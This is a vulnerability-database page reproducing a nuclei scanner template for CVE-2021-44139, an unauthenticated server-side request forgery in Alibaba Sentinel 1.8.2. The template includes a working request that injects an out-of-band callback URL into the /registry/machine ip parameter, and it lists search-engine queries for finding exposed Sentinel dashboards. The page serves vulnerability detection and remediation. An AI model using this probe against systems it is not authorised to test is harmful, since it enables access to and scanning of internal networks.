Lucene search
K

Alibaba Sentinel - Server-side request forgery (SSRF)

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Alibaba Sentinel SSRF vulnerability allows remote attackers to perform unauthorized access and network scannin

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-44139
23 Mar 202217:15
attackerkb
Circl
CVE-2021-44139
23 Mar 202219:28
circl
CNNVD
Alibaba Sentinel 代码问题漏洞
23 Mar 202200:00
cnnvd
CVE
CVE-2021-44139
23 Mar 202216:50
cve
Cvelist
CVE-2021-44139
23 Mar 202216:50
cvelist
NVD
CVE-2021-44139
23 Mar 202217:15
nvd
Prion
Server side request forgery (ssrf)
23 Mar 202217:15
prion
id: CVE-2021-44139

info:
  name: Alibaba Sentinel - Server-side request forgery (SSRF)
  author: DhiyaneshDK
  severity: high
  description: |
    There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning.
  remediation: |
    Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139).
  reference:
    - https://github.com/alibaba/Sentinel/issues/2451
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-44139
    cwe-id: CWE-918
    epss-score: 0.06485
    epss-percentile: 0.92943
    cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hashicorp
    product: sentinel
    shodan-query:
      - title:"Sentinel Dashboard"
      - http.title:"sentinel dashboard"
    fofa-query: title="sentinel dashboard"
    google-query: intitle:"sentinel dashboard"
  tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: header
        words:
          - application/json

      - type: word
        part: body
        words:
          - '"success":true'
          - '"msg":"success"'
        condition: and
# digest: 4a0a00473045022100e1774d11e1894896fc8adc804492557d5585068b60066e7f0b5bf6c9e3fa1e4602207f0f210e922cbb5c7173cfc63e9b5631503b1cad0049f9f6bc1c8524d74a4c9d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.06485
24